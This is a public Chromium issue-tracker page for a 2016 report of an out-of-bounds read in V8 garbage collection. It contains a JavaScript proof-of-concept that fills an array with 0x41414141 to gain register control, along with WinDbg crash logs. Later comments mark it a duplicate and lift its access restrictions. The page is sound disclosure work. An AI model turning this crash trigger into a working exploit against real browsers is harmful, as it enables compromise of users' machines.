Issue metadata
Sign in to add a comment
|
Security: V8 OOB Read in GC with Array Object
Reported by
sjh...@gmail.com,
Jun 18 2016
|
||||||||||||||||||||||
Issue descriptionVULNERABILITY DETAILS. i think that bug is in "gc();" methods. I was try to detail analysis this case, but already have (fixed or wontfix) issue on crbug.com. :-( i just try to control regiters. i attached to more detail V8 Crash logs in zip file. (change "RIP" register in V8 5.2.0) VERSION Chrome Version: 51.0.2704.84 m + stable 64bit Operating System: Windows 10 Pro 64bit Korean REPRODUCTION CASE // Flags: --expose-gc var o0 = []; var o1 = []; var count = 0; o1.__defineGetter__(0, function() { o0.shift(); for(i=0;i<0x1000;i++) o0.push(0x41414141); gc(); o0.concat(o1); }); gc(); o1[0]; FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION Type of crash: V8 in renderer tab Crash State: =================================== 64 bit case ======================================================= (19cc.1de8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\Program Files (x86)\Google\Chrome\Application\51.0.2704.103\chrome_child.dll - chrome_child!GetHandleVerifier+0xe9feaa: 00007ffb`2bec51fa 488b43ff mov rax,qword ptr [rbx-1] ds:41414141`00000000=???????????????? 3:032> kbn # RetAddr : Args to Child : Call Site 00 00007ffb`2bec51bc : 00000209`aa9f9810 00000057`f24f6ff0 00000000`00000000 00000057`f24f6c90 : chrome_child!GetHandleVerifier+0xe9feaa 01 00007ffb`2b2dc86c : ffffffff`ffffffff 00000209`aa97a8a0 000000e5`65651bd0 00000057`f24f6c98 : chrome_child!GetHandleVerifier+0xe9fe6c 02 00007ffb`2bec584d : 00000000`00000002 00000209`aa98dee0 00000057`00001000 00000057`00000004 : chrome_child!GetHandleVerifier+0x2b751c 03 00007ffb`2bec7783 : 00000209`aa98e930 00007ffb`2e890386 00000209`aa991310 00000000`00000002 : chrome_child!GetHandleVerifier+0xea04fd 04 00007ffb`2bea301f : 00000209`aa991310 00000000`00000001 00000209`aa9c1170 00000209`aa9c1170 : chrome_child!GetHandleVerifier+0xea2433 05 00007ffb`2bea28d6 : 00000209`ad0a0600 00000057`f24f7510 00000000`00000000 00000209`aa9c1170 : chrome_child!GetHandleVerifier+0xe7dccf 06 00007ffb`2bea1a85 : 00000209`aa9c1170 00000000`00000002 00000000`00000004 00007ffb`2e4125f8 : chrome_child!GetHandleVerifier+0xe7d586 07 00007ffb`2b2da27a : 00007ffb`2c2c59c0 00000057`f24f78f0 00000057`f24f78e8 00000057`f24f75d0 : chrome_child!GetHandleVerifier+0xe7c735 08 00007ffb`2bf1f32a : 00000209`aa9c1150 00007ffb`2c2c59c0 00000057`f24f75d0 00000209`aa9c1150 : chrome_child!GetHandleVerifier+0x2b4f2a 09 00007ffb`2be05abb : 00000000`00000000 00000209`aa9c1150 00000057`f24f7a50 00000000`00000000 : chrome_child!GetHandleVerifier+0xef9fda 0a 00007ffb`2bdff0c3 : 00000209`aa9c1208 00000000`00000000 0000021a`de804301 00000057`f24f7680 : chrome_child!GetHandleVerifier+0xde076b 0b 00007ffb`2bdff039 : 00000000`000000b8 00000057`f24f7989 00007ffb`2e890385 0000021a`de8af8e1 : chrome_child!GetHandleVerifier+0xdd9d73 *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - 0c 000003b5`e88092ab : 0000021a`de8af8e1 000000e5`6562ecf1 00000000`000000b8 00000000`00000002 : chrome_child!GetHandleVerifier+0xdd9ce9 0d 0000021a`de8af8e1 : 000000e5`6562ecf1 00000000`000000b8 00000000`00000002 00000057`f24f7a58 : 0x000003b5`e88092ab 0e 000000e5`6562ecf1 : 00000000`000000b8 00000000`00000002 00000057`f24f7a58 00000000`00000001 : 0x0000021a`de8af8e1 0f 00000000`000000b8 : 00000000`00000002 00000057`f24f7a58 00000000`00000001 0000000b`00000000 : 0x000000e5`6562ecf1 10 00000000`00000002 : 00000057`f24f7a58 00000000`00000001 0000000b`00000000 000003b5`e88091e1 : 0xb8 11 00000057`f24f7a58 : 00000000`00000001 0000000b`00000000 000003b5`e88091e1 00000057`f24f79f0 : 0x2 12 00000000`00000001 : 0000000b`00000000 000003b5`e88091e1 00000057`f24f79f0 00000003`00000000 : 0x00000057`f24f7a58 13 0000000b`00000000 : 000003b5`e88091e1 00000057`f24f79f0 00000003`00000000 00000057`f24f7a78 : 0x1 14 000003b5`e88091e1 : 00000057`f24f79f0 00000003`00000000 00000057`f24f7a78 000003b5`e883e765 : 0x0000000b`00000000 15 00000057`f24f79f0 : 00000003`00000000 00000057`f24f7a78 000003b5`e883e765 000000e5`6562ecf1 : 0x000003b5`e88091e1 16 00000003`00000000 : 00000057`f24f7a78 000003b5`e883e765 000000e5`6562ecf1 000000e5`6564e179 : 0x00000057`f24f79f0 17 00000057`f24f7a78 : 000003b5`e883e765 000000e5`6562ecf1 000000e5`6564e179 000000e5`6562ecf1 : 0x00000003`00000000 18 000003b5`e883e765 : 000000e5`6562ecf1 000000e5`6564e179 000000e5`6562ecf1 000000e5`6567c201 : 0x00000057`f24f7a78 19 000000e5`6562ecf1 : 000000e5`6564e179 000000e5`6562ecf1 000000e5`6567c201 0000021a`de8af8e1 : 0x000003b5`e883e765 1a 000000e5`6564e179 : 000000e5`6562ecf1 000000e5`6567c201 0000021a`de8af8e1 00000057`f24f7aa8 : 0x000000e5`6562ecf1 1b 000000e5`6562ecf1 : 000000e5`6567c201 0000021a`de8af8e1 00000057`f24f7aa8 000003b5`e883ba24 : 0x000000e5`6564e179 1c 000000e5`6567c201 : 0000021a`de8af8e1 00000057`f24f7aa8 000003b5`e883ba24 000000e5`6567c1e1 : 0x000000e5`6562ecf1 1d 0000021a`de8af8e1 : 00000057`f24f7aa8 000003b5`e883ba24 000000e5`6567c1e1 000000e5`6567c201 : 0x000000e5`6567c201 1e 00000057`f24f7aa8 : 000003b5`e883ba24 000000e5`6567c1e1 000000e5`6567c201 000003b5`e883b941 : 0x0000021a`de8af8e1 1f 000003b5`e883ba24 : 000000e5`6567c1e1 000000e5`6567c201 000003b5`e883b941 0000000c`00000000 : 0x00000057`f24f7aa8 20 000000e5`6567c1e1 : 000000e5`6567c201 000003b5`e883b941 0000000c`00000000 00000057`f24f7bc0 : 0x000003b5`e883ba24 21 000000e5`6567c201 : 000003b5`e883b941 0000000c`00000000 00000057`f24f7bc0 000003b5`e88252a3 : 0x000000e5`6567c1e1 22 000003b5`e883b941 : 0000000c`00000000 00000057`f24f7bc0 000003b5`e88252a3 00000000`00000000 : 0x000000e5`6567c201 23 0000000c`00000000 : 00000057`f24f7bc0 000003b5`e88252a3 00000000`00000000 00000057`f24f8460 : 0x000003b5`e883b941 24 00000057`f24f7bc0 : 000003b5`e88252a3 00000000`00000000 00000057`f24f8460 00000000`00000000 : 0x0000000c`00000000 25 000003b5`e88252a3 : 00000000`00000000 00000057`f24f8460 00000000`00000000 00000057`f24f83e0 : 0x00000057`f24f7bc0 26 00000000`00000000 : 00000057`f24f8460 00000000`00000000 00000057`f24f83e0 3fe00000`00000000 : 0x000003b5`e88252a3 3:032> r rax=0000000000000001 rbx=4141414100000001 rcx=00000057f24f6ff0 rdx=00000209aa9f9738 rsi=00000209aa9f9810 rdi=00000057f24f6ff0 rip=00007ffb2bec51fa rsp=00000057f24f6f10 rbp=00000057f24f6ff0 r8=000003b5e8849fa1 r9=000003b5e88013e4 r10=0000000000300000 r11=0000000000000400 r12=0000000000000000 r13=0000000000000001 r14=0000021ade804301 r15=00000209aa98df18 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 chrome_child!GetHandleVerifier+0xe9feaa: 00007ffb`2bec51fa 488b43ff mov rax,qword ptr [rbx-1] ds:41414141`00000000=????????????????
,
Jun 20 2016
Hi, thanks for the report. Is this the same bug as issue 620553 ?
,
Jun 20 2016
yap, right same issue. :D
,
Jun 20 2016
,
Jun 20 2016
,
Sep 28 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Oct 2 2016
|
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by ClusterFuzz
, Jun 19 2016